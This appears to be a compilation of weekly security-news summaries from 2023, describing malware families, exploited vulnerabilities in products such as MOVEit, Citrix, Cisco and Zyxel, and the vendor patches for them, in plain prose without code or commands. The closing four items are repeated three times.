Cybercriminals are using a new technique for code distribution. Guardio Labs has given this the name EtherHiding. This technique abuses Binance’s Smart Chain (BSC) contracts. In this way, malicious scripts are hidden in the blockchain. BSC is described as the “next level bulletproof hosting”. The cybercriminals responsible for this campaign used previously compromised WordPress sites. These pointed to Cloudflare Worker hosts for injecting malicious JavaScript into hacked websites. Cybercriminals have turned to abusing blockchain systems because they provide a much more resilient distribution channel. In addition, it offers better options to hide malicious code.

The Advanced Persistent Threat (APT) actor ToddyCat is linked to a number of new tools by Kaspersky researchers. These tools are aimed at data exfiltration with a focus on maintaining access, performing file operations and loading additional payloads.

Finally, Cisco has published a security advisory describing a critical vulnerability in the Web UI of Cisco IOS XE. The vulnerability allows an unauthenticated attacker to create a user account with full admin rights. With this account, the attacker has full control over the system in question.

Cisco has released updates to address a critical vulnerability affecting Emergency Responder. This vulnerability allows unauthenticated, remote attackers to log into vulnerable systems using hardcoded credentials. The issue affects Cisco Emergency Responder release 12.5(1)SU4 and is resolved in release 12.5(1)SU5. Other releases of the product are not affected by this vulnerability. The advice is to install the available update as soon as possible.

Qualys research shows that proof-of-concept exploits have been published online for a high-severity vulnerability in the GNU C library’s dynamic loader. This allows cybercriminals to gain rights to large distributed Linux installations. This security vulnerability, named ‘Looney Tunables’ is due to a buffer overflow vulnerability and affects default installations of Debian 12 and 13, Ubuntu 22.04 and 23.04, and Fedora 37 and 38.

In addition, Ubuntu has resolved several vulnerabilities in Vim. The updates address, among other things, a vulnerability that could allow a cybercriminal to execute arbitrary code on a user’s system or cause a denial of service.

Finally, the US National Security Agency (NSA) and the Cybersecurity & Infrastructure Security Agency (CISA) have published a joint advisory report. This document describes the most common misconfigurations and the tactics, techniques and procedures to exploit these misconfigurations.

Last week, new malware variants were discovered, including BunnyLoader. BunnyLoader is malware-as-a-service (MaaS) that offers several capabilities. This includes executing remote commands on the infected device, stealing browser data, and stealing system information. This information is then compressed into a ZIP file after which the data is sent to a command-and-control server. The Zscaler ThreatLabz blog describes how BunnyLoader works in more detail.

In addition, Kaspersky has published information about ASMCrypt. This is a new crypter and loader, which is based on DoubleFinger.

Progress software has released patches to fix a critical vulnerability in the WS_FTP Server Ad hoc Transfer Module and the WS_FTP Server manager interface. In WS_FTP Server versions prior to 8.7.4 and 8.8.2, a pre-authenticated attacker can exploit a .NET deserialization vulnerability in the Ad Hoc Transfer module. By exploiting this vulnerability, the cybercriminal can execute remote commands on the underlying WS_FTP Server operating system.

Currently, a critical vulnerability in LibWebP is being actively exploited by cybercriminals. More information on this vulnerability can be found in our blog.

Atlassian reports that it has patched several critical vulnerabilities. Exploitation of the vulnerabilities could lead to remote code execution by cybercriminals. The vulnerabilities affect specific versions of Jira Service Management Server and Data Center, Confluence Server and Data Center, Bitbucket Server and Data Center, and Bamboo Server and Data Center. Updates are available for all products mentioned.

The Internet Systems Consortium (ISC) is a not for profit organization focused on the development of software and services to support the Internet infrastructure. It has patched several critical vulnerabilities in its products. The vulnerabilities provide the opportunity to carry out a Denial-of-Service (DoS) attack. In this case, it concerns vulnerabilities in the Berkeley Internet Name Domain (BIND) 9 Domain Name System (DNS) software suite.

Apple recently released patches for three new zero-day vulnerabilities that are being actively exploited. These follow the two zero-day vulnerabilities at the beginning of September. This concerns vulnerabilities in iOS, iPadOS, macOS, watchOS and Safari that allow cyber criminals to increase their rights, among other things. The advice is therefore to install these updates as soon as possible.

Finally, attention to a vulnerability in GitLab. This vulnerability occurs in the Enterprise Edition and the Community Edition and allows a cybercriminal to abuse the scan execution policies. This makes it possible to perform pipeline actions as another user. An update is available, here too it is advisable to install it as soon as possible.

Cybercriminals keep expanding their way of working. Attack methods change and new techniques are applied. There is currently a campaign aimed at Facebook Business accounts. The purpose is to collect victims’ login details. This uses a variant of the Python-based NodeStealer malware. This malware compromises all browser cookies and login details. This account information can then be used for further malicious practices.

Research by Trend Micro shows that the cybercriminals behind the info stealers RedLine and Vidar are streamlining their operations and making their techniques multifunctional. The initial payloads are distributed via phishing campaigns. These are signed with Extended Validation (EV) code signing certificates. Ransomware is then spread using the same technique.

Juniper Networks said an estimated 12,000 SRX firewalls and EX switches are affected by a remote code execution vulnerability. Cybercriminals can execute code remotely without authentication. Juniper released several vulnerabilities in the form of ‘PHP environment variant manipulation’ and ‘Missing Authentication for Critical Function’ in August. Both watchTowr Labs and VulnCheck have published PoC exploits. Updates are available, it is recommended to install them as soon as possible.

Cisco warns of a vulnerability in Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Threat Defense (FTD). The vulnerability is currently being actively exploited by ransomware groups to gain access to corporate networks. There is currently no update available to resolve this vulnerability. Cisco has published a security update to mitigate the risk of exploitation.

In addition to the above update, Cisco has released updates to address critical vulnerabilities in Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform. The most important vulnerability, a weakness in the single sign-on (SSO) implementation, has been resolved in this update. Successful exploitation of this vulnerability could allow an unauthenticated, remote attacker to spoof credentials required to gain access to an affected system.

Many organizations use Microsoft Teams to facilitate collaboration and communication between employees. TrueSec has currently identified a phishing campaign that uses Microsoft Teams messages to distribute malicious attachments. Microsoft Teams users receive a ZIP file called ‘Changes to the vacation schedule’. By clicking on the attachment, the ZIP file will be downloaded from a SharePoint URL. This file then contains an LNK file disguised as a PDF document. A series of actions are then triggered leading to the installation of a payload identified as DarkGate Loader malware. DarkGate is currently still relatively unknown. However, we see an increase in the spread and the number of factors that can affect an organization. Alertness is therefore required.

Citizen Lab researchers discovered that cybercriminals exploited two zero-days to infect iPhones with Pegasus spyware. To carry out the attack, the cybercriminals sent rogue images from their iMessage account to the victim. The spyware infection takes place without any further action from the victim. Apple indicates that setting Lockdown Mode blocks this specific attack. Security updates are available for these vulnerabilities.

Researchers at the University of Wisconsin-Madison have uploaded a proof-of-concept extension to the Chrome Web Store that can steal plaintext passwords from a website’s source code. Research into the text input fields in web browsers shows that the permission model underlying Chrome extensions violates the principle of granting as few privileges as possible. In addition, the researchers found that numerous websites store passwords in clear text in the HTML source code of their web pages, allowing extensions to retrieve them.

Proof-of-concept exploit code has also been released for a critical vulnerability in VMware’s Aria Operations for Networks. The vulnerability concerns an SSH authentication bypass. This vulnerability has been fixed in the update released last Wednesday. In addition, VMware has released an update to a previous vulnerability that allowed attackers to gain administrative privileges and remotely execute code.

Further attention to the security of Microsoft SQL servers. Securonix analysis shows that cybercriminals currently use poorly secured Microsoft SQL servers to install tools like Cobalt Strike and then execute FreeWorld ransomware. FreeWorld is a newer variant of Mimic ransomware. The initial access to the host is achieved by brute-forcing the MS SQL server. It then uses the xp_cmdshell configuration option to run shell commands. The next stage involves hindering the firewall’s activities. It then connects to a remote SMB share to transfer files to and from the victim’s system and install malicious tools such as Cobalt Strike.

In a joint international action by police and judicial services, one of the largest botnets, Qakbot, has been defused. Qakbot was one of the largest botnets in the world and was used, among other things, to carry out ransomware attacks, financial fraud and distribute millions of phishing emails. If you want to know whether your data is included in the datasets, you can check this via www.checkjehack.nl

Last week an update was published regarding the Ivanti Sentry vulnerability. Since a POC exploit is currently available, we recommend patching as soon as possible.

In addition, the FBI warns that Barracuda Networks Email Security Gateway (ESG) devices that have recently been patched for a critical vulnerability are still at risk of being compromised. The solutions offered are judged “ineffective” by the FBI, partly because it continues to observe attacks. In addition, a successful breach acts as a channel to deploy different types of malware. Barracuda advises affected organizations to replace compromised equipment.

Another development in the field of malware is the new Whiffy Recon. Cybercriminals also linked to the Smoke Loader botnet use Whiffy Recon to triangulate the location of infected devices. In addition, the data obtained via WiFi scanning is enriched with data from Google’s geolocation API. With the location data, cybercriminals can carry out more targeted attacks and/or put victims under further pressure.

Finally, an updated version of KmsdBot has been released. This new version also focuses on IoT devices, while at the same time expanding the functionality as well as the possible attack surface. Research from Akamai shows that KmsdBot currently supports multiple CPU architectures and Telnet scanning. The malware targets cloud hosting providers, certain government websites and sites of educational institutions, among others.

There have been many updates regarding critical vulnerabilities in recent weeks. For example, blogs have been published about Citrix ADC, Ivanti Endpoint Manager Mobile and the BeyondTrust PRA/RS vulnerability.

Furthermore, a blog has been published with previously published vulnerabilities in the Microsoft Patch Tuesday update, including the Microsoft Message Queueing vulnerability.

In addition, a critical vulnerability has also been fixed in WinRAR. The vulnerability in the archiver could be exploited by cyber criminals to remotely execute code after opening a specially crafted RAR file. The vulnerability was discovered by ‘goodbyeselene’ and was reported to the Zero Day Initiative. An update is available, the advice is to install it as soon as possible.

Juniper Networks has also released an additional security update to mitigate critical vulnerabilities. These are vulnerabilities in the J-Web component of Junos OS. This includes all versions of Junos OS on the SRX and EX series. Combined, these vulnerabilities could allow attackers to remotely execute code on vulnerable devices.

Ivanti has published information regarding a critical vulnerability. The vulnerability is registered as CVE-2023-38035 and allows an unauthenticated attacker with access to the System Manager Portal to make configuration changes to Sentry and the underlying operating system. An update is available, the advice is to install it as soon as possible.

Last week several updates were published regarding critical vulnerabilities in Citrix ADC and Citrix Gateway. The most serious vulnerability is an unauthenticated remote code execution, registered as CVE-2023-3519. This vulnerability could allow a remote, unauthenticated attacker to execute arbitrary code. Exploitation of CVE-2023-3519 has already been observed in the wild. We advise you to install the available software updates as soon as possible.

In addition, security bulletins have been published for Adobe Coldfusion. There are seven vulnerabilities in total, three of which are critical. The seven vulnerabilities affect the following versions: ColdFusion 2018, ColdFusion 2021, and ColdFusion 2023. Updates are available. Our advice is to install it as soon as possible.

Next to this, Ivanti has released a security blog describing a critical vulnerability. The vulnerability is registered as CVE-2023-35078 and allows an unauthenticated remote attacker to access users’ personally identifiable information and make limited changes to the server.

Deployment of Mallox ransomware has increased 174 percent in the past year compared to the same period in the previous year. This is according to research by Unit 42. Mallox ransomware targets Microsoft (MS) Windows systems. This ransomware family has been active since June 2021. Typically, it exploits unsecured MS-SQL servers as a penetration vector and follows the process of double extortion. Data is stolen before an organization’s files are encrypted. Then threatened with publication.

Several distributed denial-of-service (DDoS) botnets have been observed exploiting a critical vulnerability in Zyxel devices, according to research by Fortinet. This vulnerability became public in April 2023. The vulnerability, CVE-2023-28771, is a command injection bug that affects multiple firewall models. Exploitation of the vulnerability could allow an unauthorized user to take remote control of the devices.

In the interview that the Autoriteit Persoonsgegevens (Dutch Data Protection Authority) gave to security.nl, a number of reasons for the occurrence of a data breach are discussed. Increasing security awareness among employees, offering the right tools, good supplier management and quickly updating software and systems can contribute to reducing the number of incidents.

Fortinet researchers recently analyzed two samples of the Big Head ransomware. This involved looking at the infection vector and the way in which the malware is executed. Last week, Trend Micro published a report where they analyzed a third in addition to the two previous samples. The conclusion drawn is that this malware was written by the same operator and is experimenting with different approaches to optimize the attack. Big Head ransomware is a .NET binary that installs three AES-encrypted files on the target system: one is used to distribute the malware, the second is for Telegram bot communication and the third one encrypts files and can also send the user a fake Windows show updates.

Progress, the developers of MOVEit Transfer, has released another update to fix critical vulnerabilities. The most critical vulnerability is an SQL injection bug. In addition, two more minor vulnerabilities are fixed. SQL injection vulnerabilities allow attackers to create special queries to, for example, access a database. The SQL injection bug has been registered as CVE-2023-36934. It concerns a vulnerability in the web application that can be exploited without user authentication.

Microsoft has again released an update for an issue with Defender Antivirus where users of Windows 11 21H2 and 22H2 received notifications that Local Security Authority Protection was disabled. The problem with LSA Protection has been around for quite some time. The problem was initially supposed to be solved in April. However, that update was withdrawn in May, after which a new update has now been released.

Trend Micro researchers have discovered that ransomware group BlackCat is currently spreading Cobalt Strike malware through malvertising. For example, through the use of Google Ads and/or hijacking specific keywords, fake ads are shown on the search results pages of Bing and Google. In this case, it concerns advertisements for downloading WinSCP. The idea is to trick users searching for applications like WinSCP into downloading malware, in this case a backdoor containing a Cobalt Strike Beacon that connects to a command-and-control server for follow-up actions, such as increasing network access or obtaining higher access rights.

Cybersecurity company Avast has released a free decryptor for the Akira ransomware. Thanks to this decryptor, victims can restore their data without paying a ransom. Both a 64-bit and a 32-bit version are available.

RustBucket malware, targeting Apple macOS systems, has been given improved capabilities for, among other things, avoiding detection by security software, according to Elastic Security Labs researchers. In addition, the malware currently uses a dynamic network infrastructure command-and-control method. Compiled in Swift, the malware works like a two-stage missile and is designed to download the main malware from the command-and-control server. This main malware is a Rust-based binary with functions to collect extensive information. Additionally, Mach-O binaries are retrieved from the infected system or shell scripts are executed.

Installing updates is an essential measure to reduce the risk of a cyber incident. Malware is currently active that causes LB-Link and TP-Link routers of the AX21 (AX1800) type to become part of a DDoS network. LB-LINK’s routers are under attack via a vulnerability (CVE-2023-26801). This allows an attacker to execute arbitrary commands on the router. There are currently no updates available yet, so it is advised to take mitigating measures.

In the case of TP-LINK, this is a vulnerability (CVE-2023-1389). This is a vulnerability (CVE-2023-1389) that allows command injection through the web interface. After which a cybercriminal can install malware. Updates for this vulnerability were already released at the end of April, we advise you to install these (still) as soon as possible.

Fortinet has released an update to address a critical vulnerability in its FortiNAC solution. Malicious people can take over systems remotely by exploiting this vulnerability. The advice is to install the available update as soon as possible.

Furthermore, a critical vulnerability in Zyxel NAS equipment is being actively exploited. This specifically concerns the NAS326, NAS540 and NAS542 types. Exploiting the vulnerability allows cybercriminals to execute system commands on the NAS device without requiring any credentials. An update is available, the advice is to install it as soon as possible.

A new infostealer called Mystic Stealer has gained strong popularity among cybercriminals in recent months. The malware is offered on various forums at a subscription price of $150 per month. The malware targets 40 Web browsers, 70 browser extensions, 21 cryptocurrency applications, 9 MFA and password management applications and 55 cryptocurrency browser extensions, among others.

Mystic Stealer targets all Windows versions, from Windows XP to Windows 11, and supports 32- and 64-bit OS architectures. The malware does not rely on specific system components, minimizing its footprint on infected systems and making detection difficult. In addition, Mystic Stealer performs several anti-virtualization checks, such as inspecting CPUID details to ensure it is not running in sandboxed environments. Both Zscaler and Cyfirma warn of the emergence and sophistication of this malware.

Again, attention to a vulnerability in MOVEit Transfer. Progress recommends that all HTTP access to their environments be restricted after information about a new SQL injection error (SQLi) became public (CVE-2023-35708). This vulnerability could lead to escalated privileges and unauthorized access to environments. The organization has released security patches to fix this new critical vulnerability for all affected software versions.

BatCloak is a tool designed to encrypt batch files. These BAT files have been found to be capable of bypassing antivirus detection solutions in about 80% of cases. Trend Micro researchers discovered hundreds of heavily encrypted batch files used to deploy modified and completely undetectable (FUD) malware. These files demonstrated a remarkable ability to continuously bypass security solutions. As a result, this allows cybercriminals to undetectably load different malware families and exploits for subsequent execution.

Fortinet has released updates to a critical vulnerability in the firmware of its Fortigate firewalls. These updates fix a previously undisclosed vulnerability in SSL VPN devices. The updates have been released in versions 6.0.17, 6.2.15, 6.4.13, 7.0.12 and 7.2.5 of the FortiOS firmware. Our blog provides more information about this critical vulnerability.

Security vulnerabilities have been discovered in Honda’s e-commerce platform. The absence and/or improper implementation of access controls allowed attackers to perform a password reset on Honda’s Power Equipment Tech Express (PETE) website. This allowed attackers to gain unlimited access to sensitive dealer data. Exploiting this vulnerability allowed attackers to gain full admin rights after which dealer data also became accessible and could be manipulated.

In addition to the previous reports surrounding critical vulnerabilities in MOVEit Transfer, new vulnerabilities have been published. All MOVEit Transfer versions are vulnerable. The vulnerability allows unauthenticated attackers to compromise servers exposed over the Internet and modify or extract customer data. It is strongly recommended that the June 9 update be installed as soon as possible.

A number of known vulnerabilities in Zyxel firewalls are currently being actively exploited. Two of these critical vulnerabilities allow an attacker to take over the firewall remotely. The advice is to disable the HTTP/HTTPS services used to manage the devices from the WAN. This will prevent the firewall from being accessed from the Internet. Updates for the vulnerabilities were released in late May. The advice is to install them as soon as possible.

Another vulnerability that is currently being actively exploited is a vulnerability in MOVEit Transfer. This software allows organizations to securely exchange files between organizations and/or with customers. According to Rapid 7, this is an SQL injection vulnerability. This can result in remote code execution. Currently, an update is not yet available for every version. To prevent exploitation, it is recommended to block external traffic to ports 80 and 443 on the MOVEit Transfer server. More information on mitigating measures can be found here.

Analysis of the Linux variant of the new ransomware family BlackSuit is very similar to Royal ransomware. Based on research conducted by TrendMicro, a very high degree of similarity is apparent, including 98 percent similarity based on functionality. Apart from this high degree of similarity, there are also differences. For example, BlackSuit includes additional command-line arguments and several files with specific extensions are avoided in the encryption process.

One way to make it harder for cybercriminals to carry out their activities is to use unique, strong passwords. To remember all these passwords, many people use a password manager, such as KeePass. The passwords in KeePass are stored encrypted in a database protected by a master password. Only when logged in with this master password are the stored data accessible. However, due to a vulnerability in KeePass, it is possible in specific cases to retrieve this master password in plain text, regardless of whether the device KeePass is installed on is locked and/or KeePass is active. There is a Proof of Concept (POC) for this vulnerability. The vulnerability impacts versions 2.x for Windows, Linux and macOS. This vulnerability is expected to be fixed with the 2.54 update.

TurkoRat, an open source infostealer, was discovered in two rogue packages in the npm package repository. The infostealer, analyzed by ReversingLabs, targeted login credentials, website cookies and crypto-wallet data, among other things. The two packages, nodejs-encrypt-agent and nodejs-cookie-proxy-agent, were collectively downloaded about 1,200 times before being identified and removed.

Recently, Microsoft observed the use of CL0p ransomware by Sangria Tempest, an actor previously known as FIN7. In the recent attacks, Sangria Tempest uses the Powershell script POWERTRASH to gain a foothold within the victim network. It then uses OpenSSH and Impacket to move through the network and execute the ransomware.

Configuration errors can be used by cybercriminals as a possible attack path to penetrate an organization. CLR SqlShell Malware is a form of malware that targets Microsoft SQL (MS SQL) servers for the purpose of deploying cryprocurrency miners and ransomware. The report shared by AhnLab Security Emergency response Center indicates that SqlShell is a strain of malware that once installed on an MS SQL server supports various functions, such as executing commands from cybercriminals and performing all kinds of malicious behavior.

Cisco Talos describes a new phishing-as-a-service platform called Greatness. The target of these phishing campaigns are corporate Microsoft 365 cloud accounts. Affiliates using Greatness are provided with an attachment and link builder that creates highly convincing bait pages and login pages. This takes into account company logos and background images and the automatic completion of the victim’s email address. In addition, Greatness also offers features such as bypassing multifactor authentication, IP filtering and integration with Telegram bots.

Akira is a new ransomware family first seen during ransomware attacks in March. This family is separate from the 2017 ransomware of the same name. It first exfiltrates data, then deletes Windows Shadow Volume files from devices with a PowerShell command and encrypts the data. The Windows Restart Manager API is used to close open files if they prevent the encryption process. The ransom message states that after payment, the attacker will share a “security report” indicating which vulnerability or vulnerabilities were used to get into the victim’s home.

Three critical vulnerabilities in Microsoft Azure API Management service have been disclosed. These include two server-side request forgery (SSRF) vulnerabilities. Ermetic research shows that by exploiting the SSRF vulnerabilities, attackers could send requests from the service’s CORS proxy and the hosting proxy itself and bypass Web application firewalls. The third case involves the abuse of the unlimited file upload functionality in the API Management developer portal. An update is available for these vulnerabilities.

Malware distributed through Google Ads is not new. This technique is also used to spread new malware called LOBSHOT. Elastic Security Labs has written an analysis on how this malware works. LOBSHOT is a remote access trojan that when the malware runs on a system, first looks to see if Microsoft Defender is active and then disables it. It then changes the system settings so that the malware automatically launches when the user logs into Windows. It then passes on system information from the infected system, including running processes.

Finally, focus on Fleckpe, an Android trojan. This trojan was spread via legitimate apps in the Google Play Store. Kaspersky researchers discovered the malware in 11 apps, including photo editing apps and smartphone wallpaper apps. The malware has been installed on more than 620,000 devices since 2022. The apps have since been removed from the Play Store. Fleckpe tried to get victims to subscribe to expensive premium services. In doing so, the malware was even able, if an additional confirmation code was required, to extract this code from notifications and use it. This form of malware is currently increasing in popularity, according to Kaspersky.

Cybercriminals are offering a new infostealer on Telegram. This infostealer, named Atomic macOS Stealer (AMOS), targets systems running Apple macOS. Cyble Research and Intelligence Labs researchers say this infostealer steals various types of information, including passwords, full system information, files from the desktop and from the documents folder and even the macOS password. In addition, it also targets multiple browsers and crypto wallets.

Furthermore, a new version of ViperSoftX was discovered by Trend Micro researchers. This malware also falls into the category of infostealers. This new version targets a wider range of targets including more cryptowallets and password managers such as KeePass and 1Password. In addition, it can now infect several other browsers in addition to Chrome. Finally, several tweaks have been made that have improved ViperSoftX’s encryption while ensuring that detection by security tooling is made more difficult.

An update is available for two vulnerabilities in Zyxell firewalls. The first vulnerability (CVE-2023-28771), allows cybercriminals to remotely execute certain OS commands by sending crafted packets to the affected device. This is possible due to improper processing of error messages in some firewall versions. The second is CVE-2023-27991. In this case, an authenticated attacker is enabled to execute some OS commands remotely.

A vulnerability in Veeam Backup and Replication (VBR) software is currently being exploited by cybercriminals. This vulnerability exposes encrypted credentials stored in the VBR configuration database to unauthenticated users in the backup infrastructure. This can be exploited to gain access to backup infrastructure hosts. Veeam backup servers are currently being targeted by at least one group of cybercriminals known to collaborate with multiple high-profile ransomware gangs. An update is available, the recommendation is to install it as soon as possible.

A critical vulnerability in VMware Aria Operations for Logs, can allow an unauthenticated attacker to execute code as root. This vulnerability is registered as CVE-2023-20864 and is present in version 8.10.2. An update has been released for this and it is advised to install it. In addition, vulnerability CVE-2023-20865 has been disclosed for the same product, it is present in other versions of the software. This vulnerability is exploitable only if a cybercriminal already has administrator privileges on the system. More information on these vulnerabilities can be found here.

An update is also available for a vulnerability in Cisco Industrial Network Director (CVE-2023-20036). This vulnerability is located in a WebUI component and is caused by incorrect input validation when uploading a Device Pack. This allows a cybercriminal to execute arbitrary commands on the operating system of an affected device without authorization.

A new “all-in-one” infostealer has surfaced. This malware, called EvilExtractor, contains several modules that operate through an FTP service. Fortinet’s analysis shows that the primary goal of this malware is to steal browser data and information from infected endpoints. This data is then uploaded to the cybercriminal’s FTP server. In addition to stealing information, the malware also allows cybercriminals to roll out ransomware.

Bumblebee malware is also currently being actively spread by using malicious advertisements and influencing search results. Bumblebee can be used to install spyware or ransomware on infected endpoints. Infected installation files that install popular apps such as Zoom, Cisco AnyConnect, ChatGPT and Citrix Workspace are used to spread the malware. Often, these installation files are hosted on websites with a URL similar to that of the official company. Users should take great care to download software only from official websites of these companies. Companies are advised to offer commonly used software centrally to their employees.

New malware is circulating that focuses on stealing user data. This malware, called Zaraza, is offered for sale through Telegram. It additionally uses Telegram as a command-and-control server. Zaraza can steal data from 38 browsers, including Google Chrome, Microsoft Edge and Firefox. For cybercriminals, data such as usernames, passwords, bank details and e-mail accounts are worth gold and can be sold on online marketplaces, for example.

Palo Alto’s Unit 42 team observed a Vice Society data exfiltration script during a recent incident via script blocking Windows Event Logs. The Vice Society ransomware group developed this script to steal data from victims. In doing so, they take advantage of the Windows Powershell functionality present on victims’ systems. This method is called “Living off the Land,” in which attackers abuse pre-existing software to be less likely to be noticed.

Action1, a solution for remote monitoring of endpoints , is currently being increasingly abused by cybercriminals as well. Action1 is used by administrators to automate patch management, deploy security updates and remote support on endpoints, among other things. It is currently being abused by cybercriminals during ransomware attacks.

During last week’s Microsoft patch round, three major vulnerabilities were fixed in the Message Queueing service. One of the most important concerns a vulnerability where an unauthenticated attacker has the ability to remotely execute code by sending a specific network packet to the Microsoft Message Queueing service. A security update is available; we recommend installing it as soon as possible.

Two actively exploited zero-day vulnerabilities allow cybercriminals to completely take over Apple systems. These security vulnerabilities are in IOSurfaceAccelerator (CVE-2023-28206) and WebKit (CVE-2023-28205), the browser engine developed by Apple. Apple says it has fixed both vulnerabilities in iOS 16.4.1, iPadOS 16.4.1 and macOS Ventura 13.3.1. For macOS Big Sur and Monterey, version 16.4.1 of Safari has been released that fixes only the WebKit vulnerability.

The Balada Injector malware caused a lot of damage to WordPress websites. More than 1 million websites were infected by this malware that has been active since 2017. This Balada Injector campaign exploited vulnerabilities in themes and plug-ins to invade websites. Among other things, the malware creates a user account with administrator privileges. In addition, it collects data from the host system and creates backdoors to maintain access. WordPress users are advised to keep their software up-to-date, change the admin user password to a strong one and remove unused themes and plug-ins.

Taiwanese company Micro-Star International (MSI) has officially confirmed they had a ransomware attack. MSI did not disclose details on how or when the attack occurred but does say that they immediately initiated the incident response protocol. MSI further states that affected systems are gradually functioning normally and says users should only download and install firmware/BIOS updates from their official website and not from other sources.

SD Worx (Belgium) has been hit by a cyber-attack. SD Worx performs HR and payroll operations and serves 5.2 million employees across more than 82.000 companies. After discovering this malicious activity in the data center, the systems are pre-emptively isolated to limit further consequences. This affects UK customers. At this time, they are unable to log into SD Worx’s systems and will be kept informed of how the situation continues.

Several malware botnets are currently targeting Cacti and Realtek vulnerabilities with the goal of spreading ShelBot and Moobot malware. Moobot is a variant of Mirai malware. This malware was detected in December 2021 when it targeted Hikvision cameras. Since then, the malware has been updated and targets multiple D-Link RCE vulnerabilities. One of Moobot’s functionalities is its ability to scan for other known bots after which the associated processes are terminated. In this way, Moobot can utilize its maximum capacity to carry out DDoS attacks.  ShellBot was first discovered in January 2023 and targets the Cacti vulnerability. Fortinet has spotted three versions of this malware, indicating that it is being actively maintained and modified. We recommend installing (security) updates as soon as they become available. If a device is no longer actively maintained by a vendor, replace it with a newer model. If that is not possible, ensure good detection and response capabilities in the periphery of the device.

SentinelLabs has analyzed several versions of AlienFox. AlienFox is a set of scripts distributed primarily through Telegram and are easily accessible on GitHub and others. This ensures that the scripts are constantly being modified by cybercriminals, creating multiple versions. AlienFox is primarily used to collect API keys and information from popular services, including information from configuration files of service providers such as AWS, Google Workspace, Office365, OneSignal and Twilio.

Furthermore, new malware aimed at stealing information has been discovered. Named MacStealer, this malware targets Apple’s Catalina and later macOS versions that use Intel M1 and M2 CPUs. Although the malware is still under development, it is already capable of exfiltrating iCloud Keychain data, passwords and credit card information stored in browsers such as Brave, Google Chrome and Mozilla Firefox.

The Voice over IP (VoIP) desktop client 3CXDesktopApp, with version numbers 18.12.407 and 18.12.416, likely contains a library modified by a cybercriminal to carry out supply chain attacks. When used in your environment, the 3CXDesktopApp can be used to download malicious payloads to the system on which it is installed. Currently, these payloads appear to be information-stealing malware. Currently, the 3CXDesktopApp for the Microsoft Windows OS and MacOS is known to contain the malicious code.

In recent months, much has been written about the pros and cons of tools such as ChatGPT. Because of its popularity among many people and organizations, the tool has also become attractive to cybercriminals. They have introduced a rogue browser extension called Chat GPT for Google. This rogue extension aims to capture Facebook session cookies in order to gain access to accounts. These accounts are then used to promote rogue activities. This manifests itself, for example, in promoting from buying likes to ISIS propaganda. Currently, the extension has been taken offline, but the advice remains to be wary with this type of extension.

Increasingly, the Android banking trojan Nexus is being used by cyber criminals to attack financial login portals and applications to commit fraud. Nexus provides all the key features to perform account takeover attacks against banking portals and cryptocurrency services, such as stealing user data and intercepting text messages. Source code suggests that functionalities are likely still under development. One of these functionalities appears to be encryption, which may indicate a future ransomware module.

IcedID, also known as BokBot, began as a banking trojan in 2017. This trojan is also capable of delivering additional malware, including ransomware. Multiple groups have been spotted deploying two new variants of this malware. One of the new versions is a lite version that was previously flagged as a follow-up payload of the Emotet malware. A Forked variant of IcedID was also discovered in February 2023. Remarkably, these new versions omit the web injections and backconnect functionality normally used for bank fraud. Most likely, the modified variants are used to divert the malware from the typical banking trojan and bank fraud to focus on payload delivery, which likely includes ransomware delivery.

A new ransomware group called “Dark Power” has emerged. The group claims to have already claimed 10 victims in the first month. The Dark Power payload was written in Nim, a cross-platform programming language. Because Nim is growing in popularity among cybercriminals, it is generally considered a niche choice that is unlikely to be detected by a large portion of cybersecurity solutions.

In recent months, much has been written about the pros and cons of tools such as ChatGPT. Because of its popularity among many people and organizations, the tool has also become attractive to cybercriminals. They have introduced a rogue browser extension called Chat GPT for Google. This rogue extension aims to capture Facebook session cookies in order to gain access to accounts. These accounts are then used to promote rogue activities. This manifests itself, for example, in promoting from buying likes to ISIS propaganda. Currently, the extension has been taken offline, but the advice remains to be wary with this type of extension.

Increasingly, the Android banking trojan Nexus is being used by cyber criminals to attack financial login portals and applications to commit fraud. Nexus provides all the key features to perform account takeover attacks against banking portals and cryptocurrency services, such as stealing user data and intercepting text messages. Source code suggests that functionalities are likely still under development. One of these functionalities appears to be encryption, which may indicate a future ransomware module.

IcedID, also known as BokBot, began as a banking trojan in 2017. This trojan is also capable of delivering additional malware, including ransomware. Multiple groups have been spotted deploying two new variants of this malware. One of the new versions is a lite version that was previously flagged as a follow-up payload of the Emotet malware. A Forked variant of IcedID was also discovered in February 2023. Remarkably, these new versions omit the web injections and backconnect functionality normally used for bank fraud. Most likely, the modified variants are used to divert the malware from the typical banking trojan and bank fraud to focus on payload delivery, which likely includes ransomware delivery.

A new ransomware group called “Dark Power” has emerged. The group claims to have already claimed 10 victims in the first month. The Dark Power payload was written in Nim, a cross-platform programming language. Because Nim is growing in popularity among cybercriminals, it is generally considered a niche choice that is unlikely to be detected by a large portion of cybersecurity solutions.

In recent months, much has been written about the pros and cons of tools such as ChatGPT. Because of its popularity among many people and organizations, the tool has also become attractive to cybercriminals. They have introduced a rogue browser extension called Chat GPT for Google. This rogue extension aims to capture Facebook session cookies in order to gain access to accounts. These accounts are then used to promote rogue activities. This manifests itself, for example, in promoting from buying likes to ISIS propaganda. Currently, the extension has been taken offline, but the advice remains to be wary with this type of extension.

Increasingly, the Android banking trojan Nexus is being used by cyber criminals to attack financial login portals and applications to commit fraud. Nexus provides all the key features to perform account takeover attacks against banking portals and cryptocurrency services, such as stealing user data and intercepting text messages. Source code suggests that functionalities are likely still under development. One of these functionalities appears to be encryption, which may indicate a future ransomware module.

IcedID, also known as BokBot, began as a banking trojan in 2017. This trojan is also capable of delivering additional malware, including ransomware. Multiple groups have been spotted deploying two new variants of this malware. One of the new versions is a lite version that was previously flagged as a follow-up payload of the Emotet malware. A Forked variant of IcedID was also discovered in February 2023. Remarkably, these new versions omit the web injections and backconnect functionality normally used for bank fraud. Most likely, the modified variants are used to divert the malware from the typical banking trojan and bank fraud to focus on payload delivery, which likely includes ransomware delivery.

A new ransomware group called “Dark Power” has emerged. The group claims to have already claimed 10 victims in the first month. The Dark Power payload was written in Nim, a cross-platform programming language. Because Nim is growing in popularity among cybercriminals, it is generally considered a niche choice that is unlikely to be detected by a large portion of cybersecurity solutions.

